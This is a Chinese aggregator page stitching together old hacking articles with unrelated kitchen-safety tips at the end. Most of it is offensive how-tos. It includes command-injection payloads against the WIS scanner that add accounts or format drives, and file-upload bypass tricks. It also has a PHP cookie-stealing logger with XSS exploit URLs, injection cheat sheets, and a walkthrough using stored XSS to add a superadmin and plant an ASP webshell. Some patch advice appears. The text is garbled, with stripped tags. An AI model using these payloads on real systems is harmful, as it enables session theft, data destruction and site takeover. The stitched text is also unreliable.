下面是小编精心整理的小榕的WIS漏洞补充篇及利用篇脚本安全(共含8篇),仅供参考,大家一起来看看吧。同时,但愿您也能像本文投稿人“houhiyo”一样,积极向本站投稿分享好文章。
编者:昨天就看见ALLyeSNO的这个文章了,但是始终不明白原文里说的意思.直到今天......
漏洞发现者 : ALLyeSNO blog.csdn.net/freexploit/
WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码
&net user allyesno 12345 /add
不是wis&net user allyesno 12345 /add
而是 使用 wis对 某一个网站进行扫描的时候
我们可以利用wis未过滤& 在被扫描的网站代码 例如asp代码中嵌入&net user administrator 12345 /add
当wis对它进行扫描的时候 结果如下
sqlbug?=sql&net“>www.target.com/sqlbug?=sql&net user administrator 12345 /add
本地执行wis &net user allyesno 12345 /add是肯犊梢缘 因为&是把两段指令连在一起执行
下面是喜欢忧伤写的一篇关于这个漏洞的文章,本来他说要好好写下再发,可我等不及了
作者:喜欢忧伤 www.powers.com.cn
问题的产生
1.&用来连接两条Dos命令,就是cmd.exe 会把&前后的命令分开两句来执行
2.wis这个工具没有过滤&
所以在
你用这个工具去扫描别人的时候就会出问题
正常情况下是
你的cmd.exe下执行wis www.xx.com/?xx.asp?id=123
没什么问题
如果碰到
www.xx.com/?xx.asp?id=123&net user test 123 /add
的时候就变成你的cmd.exe执行
wis www.xx.com/?xx.asp?id=123&net user test 123 /add
看清楚了
这个语句中有一个&,所以相当于
wis www.xx.com/?xx.asp?id=123
net user test 123 /add
也就是在你的机器上执行了两个语句,
小榕的WIS漏洞补充篇及利用篇脚本安全
,
。。
wis www.xx.com/?xx.asp?id=123
没问题,执行后半句的时候就来问题了,增加用户了
那你机器上当然添加了一个帐号了
当然, 还有更狠的:
www.xxx.com/a.asp?id=1&format d: /q
www.xxx.com/a.asp?id=1&format e: /q
www.xxx.com/a.asp?id=1&format f: /q
......
www.xxx.com/a.asp?id=1© c: d:
www.xxx.com/a.asp?id=1© c: e:
www.xxx.com/a.asp?id=1© c: f:
.....
d,e,f,...资料很可能全没有了,。哈哈
脚本入侵-上传漏洞总结篇(臭小子),从事于网站开发的程序员要看下,不要让自己的程序别 利用,
1:抓包上传我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具
说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具
很好用
说到抓包上传 比如一个上传地址site/upload.asp
或后台管理后台上传地址
我们就抓包cookies 参数 和文件上传成功地址
然后用明小子或等等抓包工具 上传。大家可以去百度搜索相关的教程和文章看看
2:抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如hack92.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80
大家可以去百度搜索下nc上传 或突破 等等教程文章看
3:本地上传漏洞
把下面的代码 保存为hack92.html
------------------------------
encType=multipart/form-data>
------------------------------------------
添加上传地址
把
把:把上传地址复制这里到这里 你的上传地址
然后打开hack92.html 出现两个页面 第一个上你的图片木马 然后在上你的ASP木马
提示在上asp木马记得 加个空格
4:iis漏洞
把我们的asp木马 改成xxx.asp;xxx.jpg 或xxx.asp.jpg
或建立asp.asp asa.asa 目录 上图片asp木马
5:上传突破
当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!
大家可以去百度搜索相关的文章和教程
漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表,
利用形式1:
myhack58.com/web2/?u=Club_talk_list&tag=
其中myhack58.com/web2/为网站连接,Club_talk_list为用户自定义版块。
利用形式2:
myhack58.com/web2/?a=list&tag=
其中myhack58.com/web2/为网站连接,这个就是所谓的全局tag搜索。
漏洞危害:欺骗用户点击假冒连接盗取访问者的cookies甚至可能危害到访问者电脑安全,涉及帐户的相关信息可能被盗取。
漏洞发现者:clin003
已向官方报告漏洞情况。请wm使用者关注官方修补办法。
官方修补办法地址: webmagik.cn/bbs/viewthread.php?tid=638&pid=2225
CODE:
1 下载 module_list.php (2.83 KB)
并上传覆盖 /meta/module/module_list.php 后台重新生成各模块代码即可。
2 不想重新手工生成代码的,可以直接修改对应的 /umod/XXX_list.php 在页面最上方添加 $_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
Added By Easy
——————————————————————
临时解决办法:
在所有涉及到tag搜索的页面 添加一行代码.
[Copy to clipboard] [ - ]
CODE:
$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
官方在下一个版本会把过滤加进去。顺便说下,在模块基本设定中,如果开启不过滤数据,用户添加的内容也可以存在此问题。
----------------------------------
补充下:
在list.php(/mod/list.php)第二十四行的位置回车加上
$_REQUEST['tag'] = strip_tags($_REQUEST['tag']);
这个是全局搜索tag的地方更新模块的时候不会被更新。
——————————————————————
漏洞发现过程:
在寻找使用过的中文标签为什么会失效的答案。添加一篇文章,然后由于想把“中间带空格的标签”合起来而使用啦单引号比如:‘webmagik 跨站’,提交的时候就出现问题。一堆数据库错误信息!!
怀疑有注入漏洞,,经多次检测没有注入漏洞。
忽然想到检测下跨站的这个xss代码(上次已经检测过搜索框的iframe跨站漏洞,只是没公布)。
--------------------------------------------------
下边是介绍xss漏洞的常识
----------------------------------------------------
什么是跨站脚本(CSS/XSS)?
在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为”XSS“,这是因为”CSS“一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:”Script. Injection“,他们的区别在以下两点:
1.(Script. Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以 入远程页面?
主流脚本包括以下几种:
HTML
JavaScript. (本文讨论)
VBScript
ActiveX
Flash
测试代码:
1,在自己服务器上建立如下文件:
Getcookie.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date(”j F, Y, g:i a“);
$referer=getenv ('HTTP_REFERER');
$fp = fopen('victim.htm', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$time. '
Referer: '.$referer.'
');
fclose($fp);
?>
Xss.js
document.write('');
2,发送信息给管理员
内容包含下边的连接:
myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!
改进后的代码:
myhack58.com/web2/?a=list&tag=
成功收到cookies
3,等待管理员点击然后检查获得victim.htm内容。
4,复制从PHPSESSID= 到;的内容
启发来源:WEB漏洞挖掘技术
参考漏洞分析格式:PhpNuke管理员密码可泄露问题
link@myhack58.com
----------------------------------------------------------------------
相关链接:
XSS:wiki.matrix.org.cn/Wiki.jsp?page=XSS
跨站脚本攻击(XSS)FAQ:tech.idv2.com//08/30/xss-faq/
也谈跨站脚本攻击与防御:www.xfocus.net/articles/200607/874.html
浅析XSS(Cross Site Script)漏洞原:www.xker.com/page/e/0704/27444_3.html
PHP-Nuke个人消息存在HTML插入漏洞:www.xfocus.net/vuls/08/2970.html
--------------------------------------------------------------------
预防的办法:-----------------------------------------------
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如”<“和”>“。
可以把”<“,”>“转换为<,>
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括”=“。
对我们浏览网页的网友来说不要访问包含
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
upload//3/201103300326291646.bmp+onload=alert(”1111“)>
upload/2011/3/201103300326291646.bmp+onload=alert(”1111“)>
myhack58.com/web2/?a=list&tag=_____________一个恶意的开始!!!
upload/2011/3/201103300326291646.bmp+onload=alert('1111')>
upload/2011/3/201103300326291646.bmp+onload=alert(1111)>
myhack58.com/web2/?a=list&tag=<”
myhack58.com/web2/?a=list&tag=<'
myhack58.com/web2/?a=list&tag=<
myhack58.com/web2/?a=list&tag=
myhack58.com/web2/?a=list&tag=
以上所有的连接都检测出漏洞
漏洞利用代码:
获得cookie
myhack58.com/web2/?a=list&tag=%3Cscript%3Ealert(document.cookie)%3C%2fscript%3E
==============================================
什么是跨站脚本(CSS/XSS)?
在Web站点未经适当过滤便显示在HTML页面上时会出现这种漏洞。它允许(由用户输入的)任意HTML显示在用户的浏览器中。
我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,有时候跨站脚本被称为“XSS”,这是因为“CSS”一般被称为分层样式表,这很容易让人困惑,如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。跨站脚本漏洞常常被称为XSS漏洞。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:“Script. Injection”,他们的区别在以下两点:
1.(Script. Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以 入远程页面?
主流脚本包括以下几种:
HTML
JavaScript. (本文讨论)
VBScript
ActiveX
Flash
是什么原因导致一个站点存在XSS的安全漏洞?
许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或其他类型的错误时,
出错信息会被打印到一个html文件,并将该错误页面发送给访问者,
例如: 404 - yourfile.html Not Found!
我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成因,我们还是仔细看一下。
例:www.somesite.tld/cgi-bin/program.cgi?page=downloads.html该URL指向的连接是有效的,但是如果我们把后面的downloads.html替换成brainrawt_owns_me.html,一个包含404 - brainrawt_owns_me.html Not Found! 信息的页面将反馈给访问者的浏览器。
考虑一下它是如何把我们的输入写到html文件里的?
OK,现在是我们检查XSS漏洞的时候了!
注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一写javascript代码到页面里。当然方法很多www.somesite.tld/cgi-bin/program.cgi?page=
当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,“XSS_Vuln_Testing”?
这个例子只是一个XSS漏洞的简单演示,并无实际意义,但足以说明问题所在。
下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404 error页面中,结果创建了一个页面,如下:
404-
其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。
如何利用XSS来完成hacking?
如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html文件里。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。
事例:
假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是b00b这个人。 www.myemailserver.tld/cgi-bin/news.cgi?article=59035
把上面存在CSS漏洞的连接修改一下: www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red
这会创建了一个错误页面,我们得到如下信息: Invalid Input! [article=hax0red]
当插入下面这样的javascript代码时,你的屏幕上会弹出一个包含test的消息框。
www.myemailserver.tld/cgi-bin/news.cgi?article=进行有效过滤,所以在页面发回到浏览器并执行了该脚本。
下面我们瞧瞧如何利用该漏洞入侵 b00b同志的邮箱,首先你必须知道b00b的email地址,
并且知道cookies的作用。那么你可以告诉b00b一个恶意的连接,嘿嘿,当然
它的用意就是从b00b机器中cookie信息里获得自己想要的东东。
想办法让b00b访问myemailserver.tld站点发表的文章,比如说:”亲爱的b00b,看看这个美
女
如何呀?”
那么当可怜的b00b访问 www.myemailserver.tld/cgi-bin/news.cgi?article=
连接时,发生什么事情?cookie都有了,你该知道怎么办了吧!
如果在你目前不是这样的情形,你可以拷贝email服务器的登陆页面,挂到其他的系统上,
然后引导用户登陆你的恶意系统页面
这样用户信息你可以记录下来,然后再把记录的信息发送回真正的email服务器页面,
那些笨蛋并不会意识到实际发生的事情。
把javascript脚本插入WEB页面的不同方法:
拷贝自:GOBBLES SECURITY ADVISORY #33
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with.
[IE]
[IE]
&
&{[code]}; [N4]
[N4]
[N4]
[N4]
[IE]
[Mozilla]
[IE]
“ nmouseover=”[code]“>
[xC0][xBC]script.>[code][xC0][xBC]/script. [UTF-8; IE, Opera]
----Copied from GOBBLES SECURITY ADVISORY #33----
该脚本首先通过 $ENV{'QUERY_STRING'}获得cookie,打印到$borrowed_info变量里,
通过open(EVIL_COOKIE_LOG, ”>>evil_cookie_log“),把cookie信息保存到evil_cookie_lo
g文件。
注意:上面的javascript脚本,可能在一些浏览器或者站点上不能执行,
这仅仅是我在自己的站点上做测试用的。
如何防范XSS攻击?
1.在你的WEB浏览器上禁用javascript脚本
2..开发者要仔细审核代码,对提交输入数据进行有效检查,如”<“和”>“。
可以把”<“,”>“转换为<,>
注意:由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,
这主要依赖于所开发程序的作用,建议过滤掉所有元字符,包括”=“。
对受害者来说不要访问包含
document.write('');
xss.js
document.write('');
getcookie.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date(”j F, Y, g:i a“);
$referer=getenv ('HTTP_REFERER');
$fp = fopen('victim.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$time. '
Referer: '.$referer.'
');
fclose($fp);
?>
----------------------------------
测试 Web 应用程序是否存在跨站点脚本漏洞
发布日期: 05月06日
作者:Chris Weber,Casaba Security,LLC (chris@casabasec.com)
到目前为止,对于跨站点脚本攻击具有很大的威胁这一点大家并无异议。如果您很精通 XSS 并且只想看看有什么好的测试方法可供借鉴,那么请直接跳到本文的测试部分。如果您对此一无所知,请按顺序认真阅读!如果某个怀有恶意的人(攻击者)可以强迫某个不知情的用户(受害者)运行攻击者选择的客户端脚本,那么便会发生跨站点脚本攻击。“跨站点脚本”这个词应该属于用词不当的情况,因为它不仅与脚本有关,而且它甚至不一定是跨站点的。所以,它就是一个在发现这种攻击时起的一个名字,并且一直沿用至今。从现在开始,我们将使用它常见的缩写名称 “XSS”。
XSS 攻击的过程涉及以下三方:
•
攻击者
•
受害者
•
存在漏洞的网站(攻击者可以使用它对受害者采取行动)
在这三方之中,只有受害者会实际运行攻击者的代码。网站仅仅是发起攻击的一个载体,一般不会受到影响。可以用多种方式发起 XSS 攻击。例如,攻击者可通过电子邮件、IM 或其他途径向受害者发送一个经过经心构造的恶意 URL。当受害者在 Web 浏览器中打开该 URL 的时侯,网站会显示一个页面并在受害者的计算机上执行脚本。
XSS 漏洞是什么样的呢?
作为一名 Web 开发人员或测试人员,您肯定知道 Web 应用程序的技术基础是由 HTTP 和 HTML 组成的。HTTP 协议是 HTML 的传输机制,可使用代码设计 Web 页面布局和生成页面。
如果 Web 应用程序接受用户通过 HTTP 请求(如 GET 或 POST)提交的输入信息,然后使用输出 HTML 代码在某些地方显示这些信息,便可能存在 XSS 漏洞。下面是一个最简单的例子:
1. Web 请求如下所示:
GET www.somesite.com/page.asp?pageid=10&lang=en&title=Section%20Title
2. 在发出请求后,服务器返回的 HTML 内容包括:
可以看到,传递给“title”查询字符串参数的用户输入可能被保存在一个字符串变量中并且由 Web 应用程序插入到
3. 现在,如果站点没有在服务器端对用户输入加以过滤(因为总是可以绕过客户端控件),那么恶意用户便可以使用许多手段对此漏洞加以滥用:
攻击者可以通过摆脱
www.somesite.com/page.asp?pageid=10&lang=en&title=Section%20Title
这个请求的 HTML 输出将为:
即便是这个最简单的例子,攻击者也可以利用此连接完成数不清的事情。让我们看看会有哪些潜在的威胁,然后讨论一些更高级的测试方法。
XSS 攻击的威胁有多么严重?
由于能够在生成的 Web 页面中注入代码,能想到的威胁有多么严重,就可以有多么严重的威胁。攻击者可以使用 XSS 漏洞窃取 Cookie,劫持帐户,执行 ActiveX,执行 Flash 内容,强迫您下载软件,或者是对硬盘和数据采取操作。
只要您点击了某些 URL,这一切便有可能发生。每天之中,在阅读来自留言板或新闻组的受信任的电子邮件的时侯,您会多少次地单击其中的 URL?
网络钓鱼攻击通常利用 XSS 漏洞来装扮成合法站点。可以看到很多这样的情况,比如您的银行给你发来了一封电子邮件,向您告知对您的帐户进行了一些修改并诱使您点击某些超链接。如果仔细观察这些 URL,它们实际上可能利用了银行网站中存在的漏洞,它们的形式类似于 mybank.com/somepage?redirect=,这里利用了“redirect”参数来执行攻击。
如果您足够狡猾的话,可以将管理员定为攻击目标,您可以发送一封具有如下主题的邮件:“求救!这个网站地址总是出现错误!”在管理员打开该 URL 后,便可以执行许多恶意操作,例如窃取他(或她)的凭证。
好了,现在我们已经理解了它的危害性 -- 危害用户,危害管理员,给公司带来坏的公共形象。现在,让我们看看本文的重点 -- 测试您的网站是否存在这些问题。
简要描述:
天天看wooyun上piapiapia弹窗弹的好欢乐,但是真正利用的没几个,也导致了一些人,一些厂商,一些白帽子对XSS危害的蔑视,如果XSS的利用回想当年NBSI一样简单化,也许结果就不同了,
用事实说话。
详细说明:
我们要知道的一个事实是,很多大型互联网企业,其前台防护都很到位,但是没有人会挑保护最好的地方下手,对于前台来说,他的后台就是一个容易被忽视的地方,虽然我们不知道后台程序的构造,但是我们可以根据一些功能的性质来大胆推测,比如互联网公司安全短板--客服反馈系统。
目标地址:tousu.baidu.com
漏洞证明:
找到一个产品的投诉页面,比如文库,想这种功能比较简单的表单,我们直接提交”>
提交后如果运气好的话,
。。。。
访问了一下后台地址,居然是外网可访问的,利用得到的cookie进行会话劫持
跨站漏洞入侵百度投诉中心 用xss平台沦陷百度投诉中心后台“ alt=”利用XSS跨站漏洞入侵百度投诉中心 用xss平台沦陷百度投诉中心后台“ src=”lcx.cc/File.asp?md5=a31140f9f3cec81d4af7fd04fd8dd26c“ data-ke-src=”lcx.cc/File.asp?md5=a31140f9f3cec81d4af7fd04fd8dd26c“ width=”685“ height=”148“ style=”border: 0px; “ nload=”return imgzoom(this,550);“ nclick=”javascript.:window.open(this.src);“ style=”cursor:pointer;“/>
还有置顶编辑功能,留个脚印
修复方案:
后台不应该对公网全网开放,另外信息展现需要做输出转义。
cookie全局httponly?
摘自:www.wooyun.org/bugs/wooyun--09547
Reflected XSS(反射跨站脚本攻击)
这是最常见也是最知名的XSS攻击,当Web客户端提交数据后,服务器端立刻为这个客户生成结果页面,如果结果页面中包含未验证的客户端输入数据,那么就会允许客户端的脚本直接注入到动态页面中,传统的例子是站点搜索引擎,如果我们搜索一个包含特殊HTML字符的字符串时,通常在返回页面上仍然会有这个字符串来告知我们搜索的是什么,如果这些返回的字符串未被编码,那么,就会存在XSS漏洞了。
初看上去,由于用户只能在自己的页面上注入代码,所以似乎这个漏洞并不严重,但是,只需一点点社会工程的方法,攻击者就能诱使用户访问一个在结果页面中注入了代码的URL,这就给了攻击者整个页面的权限。由于这种攻击往往会需要一些社会工程方法,所以研发人员往往不会太过看重,但是我们看如下的例子,在服务器上有如下代码:
article.php?title=
这就使得浏览器每3秒就刷新一次页面,而且是一个死循环的状态,这就形成了DOS攻击,导致Web服务器挂掉。
DOM-Based XSS(基于DOM的XSS)
这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞,
黑盒测试和示例:
比较简单的测试是否存在XSS漏洞的方法是验证Web应用是否会对一个包含了HTTP响应的简单脚本的访问请求,例如,Sambar服务器(5.3)包含一个众所周知的XSS漏洞,我们向服务器发送如下的请求,从服务器端能够产生一个响应从而在Web浏览器中执行
server/cgi-bin/testcgi.exe?
这个脚本会在客户浏览器端被执行。
我们再举个例子:
由于Javascript是区分大小写的,有些人会尝试将所有字符转换为大写字符来避免XSS漏洞,在这时,我们最好还是使用VBScript,因为它是大小写不区分的:
JavaScript.
VBScript.
如果我们已经过滤了”<”,或者是
%3cscript. src=www.example.com/malicious-code.js%3e%3c/script%3e
x3cscript. src=www.example.com/malicious-code.jsx3ex3c/scriptx3e
注:本文首发于 手册,.请注明来源
就这样像3389离我而去,就像4489在迎接着我们,不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。
跨站虽然算不上新的技术。但在国外也是非常重视的。其实跨站代码如果构造好的话可以干出很多事来的。这不,在网上逛到了一个电影网站。
心想如果把这个站拿下来不就可以看免费的电影了。(动机不太好呀^_^)。发现程序用的是:”世纪热线全站程序完美版“于是去百度搜一下也没发有漏
洞。那么就自己下回来慢慢研究吧。
可以说这套程序在注入方面防范的还不错。但是跨站方面好象就没有做到家了。经过仔细的查找,终于被我找到了一点软胁。首先我们先注册
个用户。一般电影网站都提供影片报错的页面。这个也不例外。我们在首页随便点击一个影片。下面有个报告错误。点一下之后会打开一个页面。
因为这个报告错误只有管理员能看,我们在报告错误里写上”“,如图1所示。
点开始报告,我们再去后台的电影管理/错误报告去看一下,跨站代码被成功执行了。如图2所示。
既然这个能执行,我们在来构造一些特殊的代码吧。后台有个添加管理员的,我们先来看看它的代码是怎么实现的,添加管理员的关键代码如下:
新增管理员
用 户 名
初始密码
数字+字母10位以上
确认密码
数字+字母10位以上
权限设置
====无管理权限====
====初级管理员====
====高级管理员====
====超级管理员====
其实这个我们只在稍稍改动一下就可以了,改好的代码如下:新增管理员
用 户 名 '添加管理员名字
初始密码 '添加管理员密码
数字+字母10位以上
确认密码 '确认管理员密码
数字+字母10位以上
权限设置
====无管理权限==== '设置为超级管理员,注意这里是1
====初级管理员====
====高级管理员====
====超级管理员====
最重要的就是action后的路径和最后自动运行的脚本,路径大家一定要对上,
把上面的代码为hacklu.htm上传到自己的空间。然后再来到错误
报告的地方写上我们的挂马代码:
间的地址。这样管理员在看错误报告的时候就会添加一个名为:hacklu119的超级管理员。如图3、图4所示。
其实我们还可以构造备份WEBSHELL什么的,只是这个后台没有备份数据库的功能。所以得到WEBSHELL有一定的困难。刚开始我在添加电影的地
方上传ASP木马。又是抓名又是改扩展名的,可惜还没有成功。后来不经意发现原来这个数据库是ASP的,那么就好办了。只接在添加电影的地方
写上我们的一句话的ASP木马,如图5所示。
最后添加一下我们用客户端连接 127.0.0.1/data/jdzcn.asp 如图6所示,连接成功后会生成killbase.asp文件。最后成功得到WEBSHELL。见图7。
不过如果数据库改了名字的话,那么得WEBSHELL就不容易了。最后欢迎大家到NOHACK/BBS和我交流。我的ID是樱花浪子。
电磁炉卫生清洁、无火烹饪、使用方便等特点而深受消费者的青睐。现使用电磁炉的家庭越来越多,怎样安全正确地使用电磁炉呢,下面就和大家讲讲有关电磁炉使用时的注意事项。
使用时要“四做到”、“五注意”
“四做到”
1、锅具不要太重。电磁炉不同于砖或铁等材料结构建造的炉具,其承载量是有限的,一般连锅具带食物不应超过5公斤,而且锅具底部也不宜过小,以使炉面的受压之力不至于过重、过于集中。正在使用或刚结束使用的炉面不要马上用冷水去擦。
2、要检测炉具保护功能是否完好。电磁炉虽具有良好的自动检测及自我保护功能,它可以检测出如炉面器具使用是否得当,炉温是否过高。但也不能过分依赖,使用时间长了会产生老化失效的可能,应注意检测炉具的保护功能是否完好。丧失自动保护功能的电磁炉使用起来是很危险的。
3、电源线要符合要求。电磁炉由于功率大,在配置电源线时应选能承受15A电流的铜芯线,配套使用的插座、插头、开关等也要达到这一要求。因其用电量大,最好不要同其他电器并联使用同一插座。
4、保证气孔要通畅。工作中的电磁炉随锅具的升温而升温,因此在厨房安放电磁炉时,应保证炉体的进、排气孔处无任何物体阻挡。炉体的侧面、下面不要垫(堆)放可能损害电磁炉的物体、液体。
“五注意”
1、要有独立插座。一般电磁炉的功率较大,对使用家庭的电负荷要求较高,所以尽量不要与其他电器共线。
2、周围别堆杂物。电磁炉在工作过程中产生的热量靠炉内的冷却风扇散去,要防止炉子太热引发事故。所以,放置电磁炉,不要靠墙壁太近。使用时,周围不要摆太多东西,还要注意把灶台弄干净,防止灰尘或纸屑堵住风口。
3、平时,不要在上面放金属的东西,以免错误启动炉子。
4、锅要轻拿轻放。灶面是电磁炉的易损部件。一般连锅具带食物不应超过5公斤,锅具底部也不宜过小。
5、清洁时要轻柔。电磁炉要防水防潮,避免接触有害液体和刮伤。所以,可以用湿软布蘸清洁剂擦,避免泡水冲洗、硬刷。
遇到煤气中毒要如何自救
(1)开窗呼救 感觉自己有中毒迹象,应打开门窗呼吸新鲜空气,高声呼救,或迅速撤离现场。
(2)宽衣解扣立即开窗通风,将患者抬离中毒现场。及时为患者松解衣扣,保证其呼吸通畅,并注意保暖。
(3)静养吸氧 患者需安静休息,尽量减少心肺负担和耗氧量。如有条件,应对患者人工输氧。
(4)侧向呕吐 头部偏向一侧,及时清理其口鼻内的分泌物,以免患者回吸,导致窒息。
(5)按穴就医对烦躁不安的患者,用手导引“人中”、“足三里”“内关”等穴位,同时尽早呼叫“120”就医。
(6)心肺复苏 若患者呼吸、心跳微弱甚至停止,应立即实施心肺复苏术,直到医务人员到来。
(7)高压氧舱 应将煤气中毒者送往配有高压氧舱的医院,以利于抢救,减少后遗症。
特别提醒:炉边放水,不能防毒。有些人认为在炉边放盆冷水就可以防止煤气中毒,实际上这是完全无效的。
★ 哲理小故事「篇」
★ 安全质量演讲稿篇
★ 安全演讲稿优秀篇